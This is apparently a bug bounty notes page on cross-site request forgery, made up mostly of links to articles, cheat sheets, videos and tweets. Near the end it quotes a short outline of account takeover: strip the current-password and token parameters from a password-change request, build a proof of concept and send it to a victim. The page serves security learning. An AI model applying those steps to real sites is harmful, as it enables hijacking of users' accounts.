# Cross Site Request Forgery (CSRF)

**Blog / Articles:**

* <http://blog.opensecurityresearch.com/2012/02/json-csrf-with-parameter-padding.html>
* <https://labs.detectify.com/2017/03/15/loginlogout-csrf-time-to-reconsider/>
* <https://medium.com/@secureITmania/how-i-exploit-the-json-csrf-with-method-override-technique-71c0a9a7f3b0>
* <https://labs.detectify.com/2017/03/15/loginlogout-csrf-time-to-reconsider/>
* <https://medium.com/@zseano/site-wide-csrf-issue-chained-with-clickjacking-multiple-sites-vulnerable-6201abab0d3e>
* <https://blog.securityinnovation.com/seven-sins-of-anti-csrf-tokens?utm_campaign=Blog%20Posts&utm_content=135806080&utm_medium=social&utm_source=twitter&hss_channel=tw-213735745>
* <https://medium.com/bugbountywriteup/lets-bypass-csrf-protection-password-confirmation-to-takeover-victim-accounts-d-4a21297847ff>
*

**Bypasses / Cheatsheets:**

![https://twitter.com/hackerscrolls/status/1265217322308046849](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MIQ8_-xxD4s3lnOt_-m%2F-MIQ95wLAXE9M__Z6JNZ%2Fimage.png?alt=media\&token=5170f918-49e3-49ed-94db-8382d1aed7be)

{% file src="<https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MIPv_ZyJiFJxuzJVZnw%2F-MIQ8VN_-wACse--5jeu%2Fscreencapture-web-archive-org-web-20170330124956-http-zseano-com-tut-5-html-2020-09-30-00_04_31.pdf?alt=media&token=a002440a-f287-4765-91b0-30871b781f3b>" %}

* <https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/>

**CSRF MindMap:**

![](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MIQA6ky4JDZo8h0tVQb%2F-MIQAMy82uFSAwsyQvkj%2Fimage.png?alt=media\&token=396fce99-59fc-42d8-aac7-6ab7f1cc260c)

**Videos:**

* <https://www.youtube.com/watch?v=eWEgUcHPle0>
* <https://www.youtube.com/watch?v=ULvf6N8AL2A&feature=youtu.be>

{% embed url="<https://twitter.com/jae_hak99/status/1335192935197917185>" %}

![](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MWEPDycqJPrnCVJNq2M%2F-MWEPcBVpp_kW_FNRs7J%2Fimage.png?alt=media\&token=c3c46aec-b087-43cc-8aae-2173570bba65)

ATO using CSRF -Account setting-password change option -We need current password to change new password -capture the request,remove current password and CSRF-Token paramater -Generate CSRF poc -Send it to victim and victim password go changed [#bugbountytips](https://twitter.com/hashtag/bugbountytips?src=hashtag_click) [#BugBounty](https://twitter.com/hashtag/BugBounty?src=hashtag_click)

{% embed url="<https://twitter.com/hakluke/status/1350710129671344128?s=20>" %}

{% embed url="<https://twitter.com/Devil79830787/status/1472984805293760514?s=20>" %}